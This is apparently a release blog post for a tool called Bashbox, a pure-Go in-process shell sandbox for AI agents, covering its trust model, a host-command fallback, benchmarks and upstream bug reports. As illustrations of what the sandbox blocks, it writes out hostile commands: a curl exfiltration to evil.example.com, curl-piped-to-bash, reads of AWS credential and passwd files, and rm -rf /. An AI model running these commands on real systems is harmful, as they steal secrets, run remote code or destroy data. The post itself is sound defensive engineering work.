§ release

Bashbox: an in-process shell sandbox for agents. And what the bench told us about gbash speed.

2026-07-04 · by Dennis Gubsky · ~11 min read

Every previous loomcycle release shipped with the same honest disclaimer on the Bash tool: restricted, not isolated. The four knobs the runtime applies (cwd, scrubbed env, output bounds, wall-clock timeout) are real, but they don't change what the host kernel lets the loomcycle process do. An agent that calls Bash can cat /etc/passwd, can curl arbitrary hosts, can spawn child processes that inherit the runtime's UID. If a deployment cares about real isolation, the existing advice has been to put the whole runtime inside a container or VM.

v1.1.0 (Filesystem Volumes, RFC AH) made the asymmetry visible. Read / Write / Edit / Glob / Grep all started honoring per-agent read-only volume bindings. Bash didn't, and the docs said so explicitly: rule #7 in the runtime CLAUDE.md is "Bash refuses read-only volumes rather than ship a guarantee a shell can't keep." A read-only volume mode on Bash would be a lie, because a child sh process can cd anywhere it has filesystem permission and the host kernel sees the agent's UID, not loomcycle's enforcement.

Today's v1.3.0 closes that gap without touching the existing tool. The fix is a new opt-in tool called Bashbox, backed by gbash, a pure-Go shell interpreter that runs scripts in-process: no os/exec, no /bin/sh, no host process spawned at all. Path resolution stays inside the bound volume because there is no host kernel doing the resolving. The read-only mode is honestly enforceable because the write overlay is in RAM.

v1.3.0 ships Bashbox (RFC AJ). A new opt-in shell tool. In-process execution via gbash (Apache-2.0, pure-Go). No OS process spawned. Path-rooted at the bound volume. No network. Read-only volumes honored via an in-RAM write overlay. Opt-in twice: LOOMCYCLE_BASHBOX_ENABLED=1 per deployment, allowed_tools: [Bashbox] per agent. Stateless per call. Bundles pure-Go awk and jq on top of gbash's built-in coreutils. An operator-only host-command fallback (RFC AJ §13) lets named commands (git, gh) reach the real host shell with a credential allowlist scoped only to the host child. gbash is alpha and pinned to an exact version; the per-agent gate is the escape hatch.

The rest of this post: the shape of the new tool, the trust posture, the operator-opt-in fallback, the bench (exp10) we ran against /bin/sh, and the three issues we filed upstream to gbash.

The shape

Bashbox is a new tool in the registry. It is not a backend for the existing Bash tool. Operators add Bashbox alongside or instead of Bash in an agent's allowed_tools:

agents:
  reviewer:
    allowed_tools: [Read, Write, Grep, Glob, Bashbox]
    volumes: [repo-a, shared-ro]

Same input schema as Bash (a script string, plus the optional volume arg from RFC AH). Same tool_call / tool_result event types on the wire, so no new transport plumbing and no adapter changes. @loomcycle/[email protected] and [email protected] Python already speak the right shape; v1.3.0 intentionally ships no new client release.

Bashbox executes inside the same Go process as the runtime. No fork, no execve. The script runs through gbash's interpreter, which dispatches to a registry of pure-Go command implementations (its own ls, cat, grep, find, sed, cp, mv, rm, tar, the usual coreutils). Unknown commands do not fall through to host binaries by default. If a script invokes kubectl, gbash refuses; if it invokes git, gbash also refuses (with the explicit fallback covered below).

Two pure-Go contrib packages ship on top of the gbash builtins: awk and jq. Both are common in real agent scripts. Adding them at the loomcycle layer kept the bundle predictable: the operator opts in to Bashbox, gets a known set of commands, no host PATH leaks the surface.

Stateless per call

Each Bashbox invocation gets a fresh interpreter. No shared environment variables between calls, no cd persistence, no aliases inherited from a previous call. If an agent runs cd /work; ls in one call, the next call starts at the workspace root again. This matches how operators reason about the trust boundary: each call is a clean slate, the agent can't accumulate state via the shell.

gbash also supports a persistent Session shape (state survives across Exec calls). v1.3.0 doesn't expose that. The decision was a one-line trade-off: stateless calls make the audit trail easier to reason about, and the cost is that scripts that genuinely want state pass it explicitly (write to a file in the volume, read it next call). Persistent sessions are tracked as a future capability and will land if real agent workflows ask for them.

The trust posture

Bashbox is the first Bash-shaped tool whose isolation claim is the same shape as the rest of the file tools. The trust-table version:

Concern	Bash (existing)	Bashbox (new)
`rm -rf /`	Limited only by the runtime's UID	Limited to the in-RAM write overlay; the host base is read-only on a `ro` volume
Outbound network from a script	Subject to the HTTP allowlist for tools that route through it; raw `curl` bypasses	Blocked by default in gbash; no `curl` binary exists in the registry
`/bin/bash -c "$(curl ...)"`	Spawns a child that inherits the runtime UID	gbash refuses; no shell-out path exists
`cd ../../; ls`	Limited only by cwd setting plus host FS permissions	Refused by gbash's workspace boundary
Read a credential file outside the volume	Possible via `cat /home/user/.aws/credentials`	Refused; that path doesn't exist in the gbash workspace
Resource exhaustion	Wall-clock timeout plus output bound	Same, plus gbash's per-execution budgets on command count, loop count, output bytes
Read-only volume binding	Refused at config time (rule #7)	Accepted; writes go to the in-RAM overlay and never touch the host tree

The read-only overlay is the load-bearing piece. When a Bashbox call binds a ro volume, gbash mounts the host directory read-only as the base. Writes during the call land in a separate in-memory write layer that's discarded when the call ends. A script can touch /work/scratch.tmp inside the run and the file appears in subsequent operations within the same call, but the host filesystem never sees the write. The agent's blast radius on a ro volume is honestly bounded to the call's memory.

Two genuine new concerns to flag honestly. gbash is alpha-tagged upstream and the project's own threat model says explicitly that it is "not a hardened sandbox". For loomcycle this is acceptable because the outer trust boundary lives at the loomcycle layer (per-run credentials, scope gates, multi-tenant authz, the operator allowlist for Bashbox itself); gbash carries the in-process shell semantics, not the outer boundary. If a critical gbash bug surfaces, removing Bashbox from allowed_tools is the per-agent escape hatch, and toggling LOOMCYCLE_BASHBOX_ENABLED=0 is the deployment-wide one.

The second concern is command coverage. gbash reports 62% on the full GNU coreutils conformance suite, 87% on the runnable subset. A coverage spike against a real loomcycle script corpus (the actual Bash calls the existing exp1 / exp4 / exp7 / JobEmber.ai agents have produced) measured roughly 97% identical-or-equivalent output. The remaining 3% is the source of the issues filed upstream and covered below.

The host-command fallback (RFC AJ §13)

The 3% gap matters in practice. Real loomcycle agents call git clone, git status, gh pr list. None of those have a pure-Go equivalent the operator wants to ship inside the sandbox. The pragmatic answer in v1.3.0 is an operator-only escape valve.

Two environment knobs gate the fallback:

# Off by default. Naming specific commands opts them in:
LOOMCYCLE_BASHBOX_FALLBACK_COMMANDS=git,gh

# Off by default. Naming specific env vars opts them into the host child only:
LOOMCYCLE_BASHBOX_FALLBACK_ALLOWED_ENV=GH_TOKEN,HOME,SSH_AUTH_SOCK

Only the commands in the first list escape to the real host shell. Every other command in the same script still runs inside the gbash sandbox. So git status; curl https://evil.example.com/exfil runs git on the host and refuses curl in the sandbox. There is no smuggling escape: the script can't shell out via a fallback command to launch another command (the fallback proxy executes exactly the named binary, not a shell that re-parses).

The credential allowlist is the other half. Variables in FALLBACK_ALLOWED_ENV are injected into the host child's environment only. The sandbox env never sees them. A script that runs env inside Bashbox sees the sandbox's empty/minimal environment; the same script that runs git push sees GH_TOKEN because git is the host child, not the sandbox. The model can't read credentials through the sandbox's env, but git can use them to authenticate.

A fallback command requires a read-write volume. A host process can't honestly honor the in-RAM read-only overlay, so requesting fallback on a ro volume refuses with an explicit error. The host child's working directory maps to the host path of the script's current directory, containment-checked against the volume's host root. A loud warning fires at boot when either knob is configured.

The fallback is intentionally narrow. Operators who need git get git; operators who don't, don't carry it. The default deployment has zero fallback commands and zero credentials reachable from the sandbox.

exp10: benching gbash against /bin/sh

Honest disclosure on performance. gbash is pure-Go reimplementations of coreutils; /bin/sh calls into native C binaries that have had decades of optimization. The expectation going in was that gbash would be slower, and the question was by how much. The exp10 bench measures it on a representative coding-agent corpus: a real loomcycle git clone, file counts, grep over the tree, line-count totals, large-file scan, directory-depth probe.

The corpus runs the same script twice: once via Bash (host /bin/sh), once via Bashbox (gbash, with git in the §13 fallback). Both modes get a fresh ephemeral volume (RFC AH) per run. The numbers are wall-clock milliseconds; each op carries about 30ms of Python-subprocess overhead from the harness, which I've left in (it's constant across both modes).

Operation	Bash (ms)	Bashbox (ms)	Δ (ms)	Δ%	Notes
`cleanup`	248	556	+308	+124%
`git_clone`	357	409	+52	+15%	RFC AJ §13 fallback
`ls_root`	n/a	61			Bashbox only (sanity check)
`count_all_files`	55	104	+49	+89%	output mismatch (see below)
`count_go_files`	67	92	+25	+37%
`count_funcs`	155	636	+481	+310%
`total_loc`	1342	631	−711	−53%	gbash faster
`grep_rfc_aj`	278	782	+504	+181%
`large_files`	50	87	+37	+74%
`dir_depth`	68	86	+18	+26%
TOTAL	2968	3875	+907	+31%

Headline: 31% slower on the total wall-clock. Mixed per-op: most operations slower (the worst case is count_funcs at +310%, a grep -c across the tree), one operation faster (total_loc, a wc -l aggregate, at −53%). The git_clone step is only 15% slower because almost all the work is the real git binary via the §13 fallback; the gbash overhead is the cost of crossing the proxy.

Output verification: four of five compared ops produced identical output. One didn't.

Operation	Bash output	Bashbox output	Match?
`count_all_files`	`1274`	`1193`	✗ mismatch
`count_go_files`	`708`	`708`	✓
`count_funcs`	`8119`	`8119`	✓
`grep_rfc_aj`	`167`	`167`	✓
`total_loc`	`232733`	`232733`	✓

The count_all_files mismatch (1274 vs 1193) is not a counting bug. It's a symptom of one of the gbash findings the bench surfaced: find aborts on a relative symlink in the cloned tree, and 81 files past that symlink never reach the count. The four other ops use different traversal patterns that don't hit the same path. The bench keeps the mismatch in the report rather than papering over it; an honest mismatch is what made the upstream issue concrete enough to file.

The verdict, plainly: gbash is slower than the host shell today, and the slowdown matters for tight inner loops. For a single-shot agent script that runs grep once and writes a few files, the absolute overhead (sub-second) is invisible. For a coding-agent fleet that calls find | grep across a 200k-line tree dozens of times per minute, 3x slowdown adds up. Bashbox is shipping as opt-in because trusted-dev deployments stay on the existing Bash tool, and Bashbox is the right choice when isolation matters more than peak throughput.

What we filed upstream

The bench surfaced three specific gbash issues worth filing rather than working around. All three are open as of release:

gbash#834 — find aborts on relative symlinks

gbash's find calls EvalSymlinks on every traversed path before the type filter runs. A relative symlink inside a cloned repo (the canonical case: a file like loomcycle.example.yaml → cmd/loomcycle/embedded/...) triggers a containment check that fails and aborts the rest of the traversal. The fix sits in gbash/fs/root_resolve_posix.go:resolveContainedSymlinkTarget: the followFinal=true path through ReadWriteFS.Stat follows every symlink unconditionally for type-checking, and the containment logic refuses the symlink before the -type f filter has a chance to skip it.

The workaround in the bench: use a shell glob dir/*/ to enumerate subdirectories explicitly, bypassing the top-level symlink. This is the right short-term fix for agent scripts that need find on real repos, but the right long-term fix is upstream.

gbash#835 — grep --include=GLOB missing

gbash's grep defines 21 options; --include and --exclude are not among them. Passing --include=*.go hits the unknown-option parser and exits with code 2. The internal enumerateRecursive() function in grep.go appends every encountered file unconditionally; there is no per-file glob filter in the implementation at all.

The fix is straightforward (add includeGlobs []string to grepOptions, register the option specs, filter in enumerateRecursive before appending). The workaround in agent scripts is the older pattern: find ... -name '*.go' | xargs grep -c ..., which works because the glob filter moves upstream into find. That workaround is fine, but it's a workaround.

gbash#836 — xargs -P silently falls back to serial

The most interesting of the three. gbash's xargs parses -P N correctly and stores opts.maxProcs, and the dispatcher in runXArgsTasks correctly routes to runXArgsTasksParallel when maxProcs > 1. The parallel implementation is a stub that calls runXArgsTasksSequential immediately with no diagnostic:

// xargs.go:884
func runXArgsTasksParallel(ctx context.Context, inv *Invocation, opts *xargsOptions, tasks []xargsTask) (int, error) {
    // The current runtime subexec path is not safe for concurrent inv.Exec calls,
    // so in the sandbox we preserve -P parsing and batching behavior but execute
    // the resulting commands serially.
    return runXArgsTasksSequential(ctx, inv, opts, tasks)
}

Reproducer: seq 4 | xargs -P 4 -I{} sleep 0.5 takes about 2 seconds (serial), not 0.5 (parallel). And xargs --show-limits reports Maximum parallelism: 2147483647, the math.MaxInt32 default, which compounds the misdirection.

The root cause is honest: the inv.Exec callback shares session-level state that isn't goroutine-safe, so concurrent calls would race. The fix is either reentrant s.exec (complex; it mutates session state) or per-worker derived sessions. Until either lands, the right interim behavior is a stderr warning xargs: warning: -P N>1 not supported in this build, running serially.

Also affected: --process-slot-var always reads 0 because there's only one slot, so scripts that use the slot index as a sharding key get silent wrong answers.

One finding that didn't become an upstream issue

The bench also surfaced a code-js integration quirk worth documenting: Bashbox returns null (rather than an empty string) from a script with no stdout, which makes rm -rf foo && ...-style chains brittle in JS-shaped runners. The fix is on the loomcycle side (wrap the call result with || '' defensively in code-js scripts), not in gbash. It's logged in the exp10 report and will land in a follow-up commit to the bundled scripts.

The speed question

Bashbox at 31% slower is not the steady state. Two paths forward.

Upstream optimization. gbash is alpha and most of its commands have not been profiled against host-shell parity. The interpreter's command dispatch, the workspace overlay's stat path, the find traversal, the grep regex compile cache are all candidates. The three filed issues are the visible-correctness bugs; the speed gap is a separate body of work that the upstream maintainer is aware of and that I expect to close as the project moves out of alpha. The contrib bundle (the pure-Go awk and jq) is also where loomcycle has a direct upstream-PR path when a specific operation becomes load-bearing.

The opt-in posture is durable either way. Even if gbash never gets faster, Bashbox is the right choice for deployments that need real isolation (multi-tenant, untrusted-input workflows, JobEmber.ai-style production agents that handle user content). The existing Bash tool stays for trusted-dev workflows where the speed of the host shell matters more than isolation. Both tools coexist; operators pick per agent.

How to enable it

storage: ...        # unchanged from v1.2.0
runtime: ...

# v1.3.0: two new operator gates, both off by default
env:
  LOOMCYCLE_BASHBOX_ENABLED: "1"
  # optional: name specific host commands that may fall through:
  LOOMCYCLE_BASHBOX_FALLBACK_COMMANDS: "git,gh"
  # optional: name credentials the host child may see:
  LOOMCYCLE_BASHBOX_FALLBACK_ALLOWED_ENV: "GH_TOKEN,HOME,SSH_AUTH_SOCK"

agents:
  my-isolated-agent:
    allowed_tools: [Read, Write, Memory, Channel, Bashbox]  # ← Bashbox, not Bash
    volumes: [repo-a, shared-ro]

# Try exp10 directly:
git clone https://github.com/denn-gubsky/loomcycle
cd loomcycle/examples/exp10-gbash-bench
./run.sh

Full release notes in REVISIONS.md. The TS (@loomcycle/client) and Python (loomcycle) adapters are unchanged since v1.1.1; v1.3.0 intentionally ships no @loomcycle/[email protected] and no python-v1.3.0 because Bashbox is an in-band tool reachable on every transport and needs no wire-shape additions.

No breaking changes. The whole subsystem is additive and off-by-default; a deployment that doesn't set LOOMCYCLE_BASHBOX_ENABLED=1 sees zero behavior change. v1.0 / v1.1.x / v1.2.0 users upgrade safely.

Companion reading: v1.2.0, SQL Memory for agents (the previous release, Memory's third facet), v1.1.0, Filesystem Volumes (RFC AH, the per-agent ro/rw roots Bashbox now honors), v1.0, substrate-complete (the baseline this all rides on).